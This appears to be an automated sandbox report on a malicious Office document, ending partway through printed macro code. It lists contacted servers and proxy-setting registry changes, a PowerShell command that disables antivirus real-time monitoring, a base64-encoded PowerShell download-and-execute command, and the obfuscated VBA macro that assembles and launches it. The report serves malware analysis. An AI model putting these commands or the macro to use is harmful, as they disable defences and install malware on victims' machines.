TCP traffic to 74.59.106.11 on port 8080 is sent without HTTP header
TCP traffic to 216.239.32.21 on port 80 is sent without HTTP header
TCP traffic to 107.22.215.20 on port 80 is sent without HTTP header
TCP traffic to 195.123.245.16 on port 443 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
Remote Access Related
-
Contains a remote desktop related string
- details
-
"evnctjvlctj=dkfhaz jr" (Indicator for product: Generic VNC)
"vnchusibdz=izgehffd z isq zx" (Indicator for product: Generic VNC)
"omnlmwk=g ntae o tlz ayzc ruokfem bido qlu kxm nevnc ti zr" (Indicator for product: Generic VNC) - source
- File/Memory
- relevance
- 10/10
-
Contains a remote desktop related string
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"limewcs.exe" (Access type: "SETVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"limewcs.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"limewcs.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"ZOhPSkmvRrgs3fH129U.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZOhPSkmvRrgs3fH129U.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZPhQTlnvSsgt3fI129V.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZPhQTlnvSsgt3fI129V.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains ability to flush the cache line
- details
- clflush byte ptr [FFFFFFFFC59DF8FFh] from powershell.exe (PID: 3304) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "ChrB" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "ShowWindow" which indicates: "May hide the application" - source
- Static Parser
- relevance
- 10/10
-
Executes powershell accessing native variables
- details
-
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Indicator: "$true", UID: 00019430-00002160)
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Indicator: "$true", UID: 00020019-00003640) - source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1086 (Show technique in the MITRE ATT&CK™ matrix)
-
Invokes a process with a very long commandline
- details
- "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnACsAJwAwADIANAAyACcAKQA7ACQARwA2AF8AXwAxADEANwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAXwAwAF8ANQBfAF8AXwA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnADMANQAuADEAJwArACcAOAA0ACcAKwAnAC4ANgAxAC4AJwArACcAMgAnACsAJwA1ADQAJwArACcALwB0AGcAJwArACcAOQBwACcAKwAnAHoAZABZAEAAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA1ADIAJwArACcALgAnACsAJwAyADAAJwArACcANAAuADEAOAA2AC4AMQAwADIALwBQAEEAUwBtACcAKwAnAGsAdgBtAGIAJwArACcAQABoAHQAdABwADoALwAvADUANAAuACcAKwAnADEANwAnACsAJwAyAC4AOAAnACsAJwA1ACcAKwAnAC4AJwArACcAMgAyACcAKwAnADEALwBUACcAKwAnAGkAMAAnACsAJwBKAGUASgB1ACcAKwAnADkAJwArACcAQABoAHQAJwArACcAdABwADoALwAvADUAMgAuACcAKwAnADcAMAAnACsAJwAuACcAKwAnADIAMwAnACsAJwA5AC4AMgAyADkALwBiACcAKwAnAGwAbwBnAC8AdwBwAC0AJwArACcAYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAHUAcABsAG8AJwArACcAYQBkAHMALwAnACsAJwBQAFoAOQA2AFgAJwArACcAaQBiAEUAVQBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAyACcAKwAnADIAMgAuADEAMAA2ACcAKwAnAC4AMgAnACsAJwAxACcAKwAnADcALgAzACcAKwAnADcALwAnACsAJwB3AG8AJwArACcAcgAnACsAJwBkAHAAcgBlAHMAJwArACcAcwAvADMASQAnACsAJwAxAGUANQAnACsAJwBKAHgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARQBfAF8AMQA4ADYANwA9ACgAJwBjAF8AJwArACcAXwBfADQANwAnACkAOwAkAG0ANABfAF8ANQBfADIAMAAgAD0AIAAnADQANgAnADsAJABoADEANQA1ADcANAA9ACgAJwBxADQAJwArACcANAA0ADAAXwAnACkAOwAkAEoAMAA2AF8ANgA4ADQAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQA0AF8AXwA1AF8AMgAwACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBfADgANgAxADYAOQAgAGkAbgAgACQAYwBfADAAXwA1AF8AXwBfACkAewB0AHIAeQB7ACQARwA2AF8AXwAxADEANwA5AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAXwA4ADYAMQA2ADkALAAgACQASgAwADYAXwA2ADgANABfACkAOwAkAGwAOAA1AF8AXwBfAD0AKAAnAGgAJwArACcAXwBfACcAKwAnAF8AMAAzACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwA7ACQASQAzADcANAAyAF8AOAA9ACgAJwBMADkAMwAnACsAJwBfACcAKwAnADEAXwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcAXwAzADMAXwAzADQAPQAoACcAUQAyADAAJwArACcAMAAxADAAMQAnACkAOwA=" on 2019-2-25.20:33:40.108
- source
- Monitored Target
- relevance
- 10/10
-
Contains ability to flush the cache line
-
Hiding 3 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 22
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
- "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source
- API Call
- relevance
- 10/10
-
Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
- details
-
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTimeAsFileTime@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
-
"ipinfo.io"
"api.ipify.org"
"162.12.124.64.cbl.abuseat.org"
"162.12.124.64.zen.spamhaus.org" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"35.184.61.254:80"
"52.204.186.102:80"
"74.59.106.11:8080"
"216.239.32.21:80"
"103.122.84.170:449"
"107.22.215.20:80"
"45.250.66.10:449"
"31.131.18.108:447"
"195.123.245.16:443"
"212.80.216.238:447"
"190.146.112.216:8082" - source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"powershell.pdb"
"iwJL##$@#*$^#%@!^$.pdb"
"D:\18.2.2019\HJnbFdsq\Release\HJnbFdsq.pdb" - source
- File/Memory
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "W0_8___8.cls" (Streampath: "VBA/W0_8___8") has code: ""
File "I922__.bas" (Streampath: "VBA/I922__") has code: "Function r__64083()
Select Case l46338_
Case 687975452
X78_13_4 = n629512
b__3_07 = Sgn(207312450 * Rnd(602459106))
E0_3_1_4 = ChrB(298126283)
c8_063_ = T363_9
M0_4__53 = Sgn(638002707)
N1_58_67 = P47_77
End Select
Select Case r__48_
Case 923419307
F479780 = N0725_9
R00251 = Sgn(740234682 * Rnd(975733193))
A_04701 = ChrB(671466543)
E44074 = k61_8_9_
z7_80_ = Sgn(973789770)
S18539_ = V1_1__
End Select
Select Case H_0256__
Case 423282913
j9834_4 = C7_15628
P7_1693 = Sgn(714770467 * Rnd(332865320))
q42__7__ = ChrB(174903863)
O90_40__ = u1_4_93
z___43 = Sgn(589439973)
v490472 = h58_725
End Select
Select Case I__009
Case 926893411
w3_748 = p8_14_2_
J379_8 = Sgn(227756740 * Rnd(551510920))
T46_742 = ChrB(426462799)
Z9_3_1 = v2__09
i6744_8 = Sgn(157202448)
I19_9_1 = h45__41
End Select
Select Case Z4457__9
Case 413906988
Z3_808 = N8____1_
i72923 = Sgn(169431145 * Rnd(640922398))
C11288 = ChrB(349468016)
L_43_87 = W86_78
F_1_612 = Sgn(83411198)
X_7585 = L7541_
End Select
Select Case J27380_1
Case 580812782
M_80___ = I70_82_3
E895532 = Sgn(801750470 * Rnd(961102587))
z937568_ = ChrB(852805532)
S09_7_ = u_626_0
Z_1_54 = Sgn(222395436)
R4_45__ = w_9_73
End Select
Select Case n5___08
Case 514634297
a336__ = N373_41
C7__8_ = Sgn(48280256 * Rnd(951031852))
P53_07 = ChrB(275732577)
f___91 = z090_967
G162650 = Sgn(435600694)
Q__7__ = M85__22
End Select
Select Case i541_996
Case 419449801
q_301565 = i1__192
Y_6745_ = Sgn(455141001 * Rnd(768680618))
M7_7962 = ChrB(140679399)
j_15_57 = w8_1_487
T_0_74 = Sgn(255430736)
S_8____ = G514626
End Select
End Function
Function H4__0_0(a6852__6, T__7823)
On Error Resume Next
Select Case f047_1_
Case 326006992
S____9_ = S_005_22
d04_34_0 = Sgn(688148193 * Rnd(762928355))
w587__ = ChrB(417583208)
K3_8__1_ = w373_3_9
t3_52_ = Sgn(303969166)
J6___688 = P__4_93
End Select
Select Case w276_9
Case 907602172
w3808_96 = G7297384
G9_56_2 = Sgn(711998333 * Rnd(139818824))
T47_3_80 = ChrB(441872509)
B17__9_ = P__965
Y__4_4 = Sgn(754752109)
i5719898 = s839__07
End Select
P_60504 = (i_843_46 + "winm" + j_3___3_ + "gmts:Win32") + (C_86_53 + "_ProcessStartup" + E_6___)
Select Case U93311__
Case 744112301
m7373__ = w69_3_0_
S_7___ = Sgn(553432620 * Rnd(869606115))
c569_50 = ChrB(388608618)
s14__11 = E71195
i4_9218 = Sgn(400768908)
w__545 = P87___
End Select
Select Case B__74017
Case 789671205
c_7___6 = f27___
A85284 = Sgn(262522212 * Rnd(46935366))
X4__553_ = ChrB(489304864)
k16_96 = t08_175
E8305__ = Sgn(47873670)
n20_47_5 = N__50_4_
End Select
k331__ = (B0___28 + "winm" + X_6935 + "gmts:Win32") + (L822__33 + "_Process" + A8___58_)
Select Case z239__4
Case 282814843
l3_0___ = t441213
K17208 = Sgn(863493009 * Rnd(653102546))
C_84_32_ = ChrB(526809052)
E46__3 = D9___2
h96_53 = Sgn(866389140)
U_5_140 = G_23_5
End Select
Select Case P_3___
Case 977521791
O094__9 = l__1_7
P618__ = Sgn(264293298 * Rnd(102908345))
A_5_4531 = ChrB(107395552)
Z6775__6 = m2_90618
F4_94_ = Sgn(31429533)
s_5_5__ = a36_4_
End Select
Set S5_16_ = GetObject(N6_936_ + P_60504 + G8__6_)
Select Case c466609
Case 558162910
q2_43708 = i5_431_
w23_8_ = Sgn(749100251 * Rnd(320340887))
t_9211_9 = ChrB(268106374)
s96__44 = S_25__
I772107 = Sgn(608975756)
z4777_ = Z___98
End Select
Select Case W4850_2
Case 727295596
m0__56__ = h6190778
U_9_43_9 = Sgn(618467174 * Rnd(736549335))
V_4_1__ = ChrB(769858183)
C__24__3 = j79_24_
E4233_2 = Sgn(337524576)
f_5_8__ = z1_734
End Select
S5_16_.ShowWindow = u_43666 + 98513 - 98513 + V5___201
Select Case Y_2658_
Case 677692046
f78__9_6 = O_88611
A_02_18 = Sgn(130813058 * Rnd(155118942))
t1_240 = ChrB(552317138)
J89_82 = f_48656
R0_67___ = Sgn(637416071)
W5_8_4 = N_9_628
End Select
Select Case w80_95
Case 432500481
p7362974 = i_4_97
U822_6 = Sgn(269967762 * Rnd(837446561))
i7_8_08 = ChrB(512880834)
m84_8_56 = D8__149
q24__9_ = Sgn(287621035)
f82309 = N911_2
End Select
b_6445_ = GetObject(m_9___8_ + k331__ + l923_0).Create((p65___42 + a6852__6 + j__24_7_ + B79987 + j483_7_), (j_5__5_3), (S5_16_), (n2_22_8))
Select Case j16_4___
Case 528480239
u897__ = I8599701
M31660 = Sgn(418030713 * Rnd(16868710))
X5_594 = ChrB(557377178)
h_6___45 = U9_575_3
v__844 = Sgn(880442206)
z6__5_4_ = j35_4_
End Select
Select Case j_33_4
Case 599280475
r__172 = N2_26_3_
d_4__37 = Sgn(305567538 * Rnd(408267451))
j5_0___ = ChrB(928137399)
T000___ = z37910
z_92__ = Sgn(72056638)
K89_3192 = f31671
End Select
End Function
Function A02_215_()
On Error Resume Next
Select Case v77_28
Case 143352354
C_883__ = p10_719_
U_560_7 = Sgn(76846431 * Rnd(683181901))
C5_84_1 = ChrB(946702631)
D__35811 = J__9__7
l_397__ = Sgn(800857272)
F8__95 = K677257
End Select
Select Case i35_66_
Case 816765821
H59_8__ = m48_22
R68_3__ = Sgn(157948011 * Rnd(912079840))
u4_10593 = ChrB(679493079)
s223_61 = r__774
c9_99_92 = Sgn(768642312)
i8__7_86 = q020__
End Select
Select Case C751_54
Case 754606930
M1_2_63_ = h860_0_
Y87_031_ = Sgn(513864920 * Rnd(768141269))
Z906632 = ChrB(798613679)
w56_91_ = Q_207_4
w802943_ = Sgn(730893322)
Y__4_93 = f_456307
End Select
i760024 = "RsHe" + "Ll -nop -e JA" + "BXADMAXwA" + "1A" + "DQANgA" + "zA" + "F"
Select Case P90__201
Case 181066974
j1_1268 = K2__8__0
H_7580 = Sgn(969935138 * Rnd(395590807))
i4894__9 = ChrB(840105736)
N8__3__ = V1__2_3_
F__6410 = Sgn(83287171)
A2____5 = P_53_80
End Select
Select Case T_808_95
Case 254322936
d2127_25 = u4__237
v9448__5 = Sgn(417523788 * Rnd(478350931))
f4__1___ = ChrB(696270920)
w68_9_6 = i8_35_
Y80_0_5 = Sgn(23767848)
F80_1125 = z791_6
End Select
V_45837 = "8APQAoA" + "CcAaAA4ADYAXwAn" + "AC" + "sAJwAw" + "ADIANAAyAC" + "cAKQA7ACQARw"
Select Case R1__178
Case 974053040
D2_4__ = T4__7_
v___5___ = Sgn(812965070 * Rnd(919679441))
R141535 = ChrB(447627578)
c1___4 = i1_18_5
K5_7_0__ = Sgn(340184667)
U405_030 = t96442_
End Select
Select Case z7490_8_
Case 439687030
P234_75 = F0_57_07
j7_7_5_ = Sgn(757602292 * Rnd(898853502))
f_7003_3 = ChrB(84814229)
K8_50_ = Q262445_
C_7_18_6 = Sgn(649538411)
i578638 = h_9__94
End Select
n48224_ = "A2AF8AXwAxADEAN" + "wA5AD0AbgBlAHcA" + "LQBvAGIA" + "agBlAGMAdAA" + "gAE4AZQB0AC4AVw" + "B"
Select Case o6_9_1__
Case 467771493
R6_027 = i_374_
Y__13156 = Sgn(243404039 * Rnd(452352192))
A2_9886 = ChrB(741561760)
l_87039 = i_14399
E960_7 = Sgn(198892497)
h__92__1 = n72_6_2
End Select
Select Case a6_640_
Case 242090241
S_624_0 = W_5__08
i_0_04_6 = Sgn(141906375 * Rnd(854663476))
w596191_ = ChrB(587847508)
S730402 = X_9__762
s_6979_6 = Sgn(687620501)
b654597 = k1386__
End Select
Select Case M8_1305
Case 249885411
T__0_8_ = O_2_41
D68_5_31 = Sgn(164283775 * Rnd(83435972))
E65514 = ChrB(880387649)
Y_909_73 = z8_4_37
b0_753 = Sgn(86745754)
p_13319 = R____609
End Select
W203__ = "lAGIAQw" + "BsAGkAZQBuAHQ" + "AOwAkAGMAXwA" + "wAF8ANQ" + "BfAF8AXwA9A"
Select Case R__2892_
Case 760551725
I20_428 = S34_72_
a311963 = Sgn(823919003 * Rnd(218479648))
G0_657 = ChrB(686655829)
D54985 = v06_144
G95_7__ = Sgn(801935298)
W_8_7__8 = Z944__96
End Select
Select Case j__0023
Case 91617702
N__0__ = s4_55_
B6_47_75 = Sgn(76797126 * Rnd(974653551))
f_07746 = ChrB(711275113)
v_2__406 = F_2_22
U9913_8 = Sgn(86125106)
v26_038 = k_30_9
End Select
j_569_5_ = "CgAJwBo" + "AHQAdABwADoAL" + "wAvACcAKwAnADM" + "ANQAuAD" + "EA" + "JwAr" + "ACcAOAA0ACcAK" + "wAnAC4ANgAxAC"
Select Case i7_94__1
Case 646276110
l379_61 = O8520_43
X8_0758 = Sgn(822980635 * Rnd(475972931))
d_97___6 = ChrB(96449324)
v_932__ = i91_2_8
L9942_ = Sgn(651105961)
p25_6__0 = N4__35
End Select
Select Case p05____3
Case 735739635
i3286_ = K18_02_
S7383_1_ = Sgn(976275577 * Rnd(550709023))
Y94___4 = ChrB(318161399)
Q5_4_4_0 = k__5_9
C_64_3 = Sgn(735088815)
E_29__ = s0_3__
End Select
d6_5_2_3 = "4AJwAr" + "ACcAMgAnAC" + "sAJwA1AD" + "QAJwArACcALwB0A" + "GcAJwAr" + "ACcAOQBwAC"
A02_215_ = i760024 + V_45837 + n48224_ + W203__ + j_569_5_ + d6_5_2_3
End Function
Function r_95_334()
On Error Resume Next
Select Case j_2__79_
Case 693112018
V34008 = k60_913
u_759_6 = Sgn(47216988 * Rnd(265951586))
u1_4___ = ChrB(486079081)
h__4582 = s_93___
N_0684__ = Sgn(579033890)
r10__4_8 = X51_3_
End Select
Select Case d22120
Case 30258286
j_5_74_2 = K42331
Z03331 = Sgn(261595459 * Rnd(313752333))
M1_75_34 = ChrB(371868800)
w7_805 = w__589_
j48302_ = Sgn(539234570)
z2___7_8 = i9_5_0
End Select
W3_243_5 = "cAKwAnAH" + "oAZABZA" + "EAAJwArACcAa" + "AB0AHQAJ" + "wArACcAcAA6A"
Select Case A_5_8_
Case 793875737
K98821 = p9___437
c12_639 = Sgn(605955825 * Rnd(824223632))
P49277__ = ChrB(322993539)
H981582 = R0340_
R_8413 = Sgn(494687379)
h7_678 = s845_1
End Select
Select Case R9875_1
Case 742224474
V_43_3 = j__12_
z5_58_ = Sgn(117007121 * Rnd(429444618))
T__7_2 = ChrB(80836039)
K_9725_8 = P7804__
k09_99 = Sgn(767487068)
O___939 = u_104__
End Select
O7035__2 = "CcAKwAn" + "AC8ALwA" + "1ADIAJwArA" + "CcALgAnAC" + "sAJwAyADAAJwAr" + "ACcAN"
Select Case A__7_0
Case 585892883
G352___ = z73251
V542__6_ = Sgn(254797018 * Rnd(705440696))
b7797_ = ChrB(673941946)
p79_7_ = u7___44_
M_474_8 = Sgn(515236150)
d_764_0_ = P22165
End Select
Select Case j1_0_6
Case 325385829
n138__ = t283286
u484_4_0 = Sgn(291951405 * Rnd(210674204))
P729__8 = ChrB(591866789)
Q_0576_ = Q7_72__
T_00259_ = Sgn(385069553)
h_068_ = j_8___0
End Select
Select Case z659_553
Case 769011435
Z08___16 = C_4_7_
N_____ = Sgn(675348698 * Rnd(599200525))
w7044_ = ChrB(330758114)
S_5_530_ = j67__8
Z__520 = Sgn(870715761)
i_8405 = a_27_3
End Select
C__1_4__ = "AAuADEAOAA2AC4" + "AMQ" + "AwADIA" + "LwBQA" + "EE" + "AUwBtACcA" + "KwAnAGs" + "AdgBtA" + "GIAJwArACcAQA"
Select Case r_97635_
Case 263185619
p0820_ = w26379_
L65__6 = Sgn(160721650 * Rnd(832860178))
f_8_67 = ChrB(801753909)
j1_0301 = p3_0_28
X2464_0_ = Sgn(569268869)
w_0_4_3 = H3_9_187
End Select
Select Case J4_2580
Case 558901466
Z_76__51 = X991349
d_519_ = Sgn(304007388 * Rnd(507211054))
d__3_56_ = ChrB(766510734)
j54_20 = u2_35_14
V_625_89 = Sgn(399971500)
q8_54_92 = P0_500_
End Select
Select Case k610108_
Case 291178430
v3_642_ = Y3423_72
T2__972 = Sgn(365754112 * Rnd(83407045))
j8__1_15 = ChrB(232791427)
w_692_ = J6_0_4_
z2__7__ = Sgn(653424780)
E_7___ = G0153_
End Select
F0_6808_ = "BoAHQAdABw" + "ADoALwAv" + "ADU" + "ANAAuACcA" + "KwAnAD"
Select Case c05_7_1
Case 470853582
z26_22 = j277_028
J_86_286 = Sgn(205641076 * Rnd(959764211))
E_21_572 = ChrB(41944096)
K_422_ = z2555897
o____1 = Sgn(727971427)
i_18_2_5 = A779410
End Select
Select Case r7__01
Case 422270242
Z1724_0_ = W9_03645
U6_9__65 = Sgn(137074189 * Rnd(950181430))
E68__3 = ChrB(225715452)
a__101 = a6__9823
Q6590_ = Sgn(293774026)
G47224_ = u85_900
End Select
Select Case v_3__7
Case 370376370
F21_2313 = G8_022_8
E26___ = Sgn(821680325 * Rnd(394728722))
P_1589 = ChrB(239370074)
t___74 = R2___9
A_3_3600 = Sgn(246361464)
V728_27 = F4_03_8
End Select
T3_78_ = "EANwAnACsAJw" + "AyAC" + "4AOAAnACs" + "AJwA1" + "AC" + "cAKwAnAC" + "4" + "AJ" + "w"
Select Case Y9_8__9_
Case 102956837
H__4__ = j91_5_9
k5___151 = Sgn(329931301 * Rnd(353711186))
j__8_7 = ChrB(134445553)
N_82177 = m5903_2
r_47614 = Sgn(940800620)
O75798 = I__0_5_
End Select
Select Case q4___1_7
Case 665674256
G55915 = r983_7_2
K_533_ = Sgn(560215314 * Rnd(677526098))
u97__1 = ChrB(425390473)
j0082_ = D14___3
n_39167 = Sgn(128090769)
J960__ = j9646_
End Select
h1__473 = "ArACcAMg" + "AyACcAKwA" + "nADEALwBUAC" + "cAKwAn" + "A"
Select Case a_6791__
Case 312548794
m__558_ = r355__
r524__ = Sgn(578917282 * Rnd(525174872))
L3112_ = ChrB(610826272)
r160965 = i270302
R_34__7 = Sgn(566700739)
q16_19 = Y09_8_
End Select
Select Case a75512
Case 650610795
m11_39 = r50_962
O959070 = Sgn(462862212 * Rnd(861514560))
i___420 = ChrB(926974819)
Y10315 = w143__2
G068500 = Sgn(927706406)
j87_363 = h792_1_
End Select
i917_26 = "G" + "kAMAA" + "nACsAJwBKAGUA" + "SgB1A" + "C" + "cAK" + "wAn" + "A"
Select Case U1__79
Case 813102590
b9663___ = j__8629
O_8919 = Sgn(602105245 * Rnd(333139243))
J0510_ = ChrB(931972237)
M___7_ = f90__3
J116_986 = Sgn(593839609)
U_2_7_83 = z1_35__
End Select
Select Case Y918024_
Case 802851492
F0_188__ = k_272384
b1_49__ = Sgn(997985465 * Rnd(502811121))
k87775 = ChrB(662108568)
w5_____ = w_9_441
Z_0_47_ = Sgn(692504)
A____984 = V0__78_0
End Select
Select Case i_96_6_7
Case 541147802
R17__7 = V_2_350_
j94997 = Sgn(558707609 * Rnd(877637283))
C02_89 = ChrB(237452140)
q39____8 = A5_85_0
Y_3__8__ = Sgn(784072980)
d2__0_ = X09_770_
End Select
S0_38_ = "DkAJwArA" + "CcAQABoA" + "HQAJw" + "Ar" + "A"
Select Case b1___7_
Case 133598349
X7_028 = G_5_228
L65_09 = Sgn(809696022 * Rnd(535868662))
L_5_49_7 = ChrB(24044774)
l383__19 = M970__3
w26008_1 = Sgn(97365364)
j8_183 = i9___4_4
End Select
Select Case u057_5__
Case 168065803
I_596_7 = B_2600
d37_7__ = Sgn(8851748 * Rnd(150322444))
z657__6 = ChrB(654937346)
f6__4_ = u_3_65_
k19843_ = Sgn(665209489)
Z5041_3_ = I41_74_
End Select
z7_5_0 = "CcAdABwAD" + "oALwAvADU" + "AMgAuACcAKwAnAD" + "cAMAAnACsAJwAuA" + "CcAKw" + "AnA" + "DIA"
Select Case j7_488
Case 438273296
s2____96 = J8___86
o965_1 = Sgn(786945808 * Rnd(163555649))
c76_534 = ChrB(312005923)
w_7__79_ = j376068_
B9__02_9 = Sgn(572174678)
K_132290 = C___611
End Select
Select Case k77735
Case 192052776
t436__ = l560583_
Z8_9_4_9 = Sgn(846519239 * Rnd(5643888))
Z__6757 = ChrB(337104680)
f7_1166_ = U0_2756
M_3_4_8 = Sgn(975967260)
r8758_ = r463___2
End Select
Select Case V8_7_0
Case 848536343
j99_8256 = f3302_79
z9_729_ = Sgn(108197034 * Rnd(351849467))
b8__56__ = ChrB(989944070)
Z1224__ = F02_1_
v6310_20 = Sgn(449655443)
a004182_ = S_4_6__7
End Select
u3_9_31 = "MwAnACsAJwA5AC4" + "AMg" + "AyADkALwBiACc" + "AKwAnA" + "GwAbwBn" + "AC8AdwB" + "wAC0A" + "JwArACcAYwAnA" + "CsA"
Select Case L_1871
Case 591211381
U_0261 = w23_3_1
T_5_25 = Sgn(571755117 * Rnd(138828973))
X_8252_ = ChrB(569043034)
c052_0 = R23_76__
Q72_27_ = Sgn(481574001)
v_74__ = X4_7_0_3
End Select
Select Case F11_763
Case 21296394
f144__ = v_55144
S_54615 = Sgn(10274561 * Rnd(489550064))
l49_7_0_ = ChrB(865964495)
l33912 = p961_21_
w445__ = Sgn(698744253)
t298411 = E__348
End Select
H773440 = "JwBvAG4AdABlAC" + "cAKwAnAG4AdA" + "AvAHUA" + "cABs" + "AG8AJw"
Select Case a__6__8
Case 902125914
i__9_0 = n__89_1
Z19922 = Sgn(440276700 * Rnd(803201855))
E7_361 = ChrB(426071519)
S_4_8_ = f1515_91
Y908_191 = Sgn(144765557)
Y73__04 = D__4__
End Select
Select Case A6_5471
Case 185754983
q325_36 = z650_4_
w_39_36 = Sgn(61477263 * Rnd(95875459))
M6017_7_ = ChrB(701128897)
q796___ = Z98448
z__27_ = Sgn(128333613)
O3___398 = z93053_7
End Select
Select Case h046638_
Case 450477325
A___5_0_ = j86___2
D_4_____ = Sgn(281936313 * Rnd(664817413))
j_78_348 = ChrB(322026222)
K7_3_977 = h_2_4235
I2_1__6 = Sgn(161474321)
M84_16_0 = s49__1
End Select
B1358_2 = "ArACcA" + "YQBkAHMAL" + "wAnACsAJwBQAF" + "oAOQ" + "A2" + "AFgAJwA" + "rAC" + "cAaQBiAEUAVQ" + "BVAEAAaAB0AH"
r_95_334 = W3_243_5 + O7035__2 + C__1_4__ + F0_6808_ + T3_78_ + h1__473 + i917_26 + S0_38_ + z7_5_0 + u3_9_31 + H773440 + B1358_2
End Function
Function X_44_8_3()
On Error Resume Next
Select Case A1_735_
Case 434560605
i98068 = n23893_6
X073_81_ = Sgn(388972380 * Rnd(222192693))
S1562__2 = ChrB(252593813)
S__5879_ = B_397_
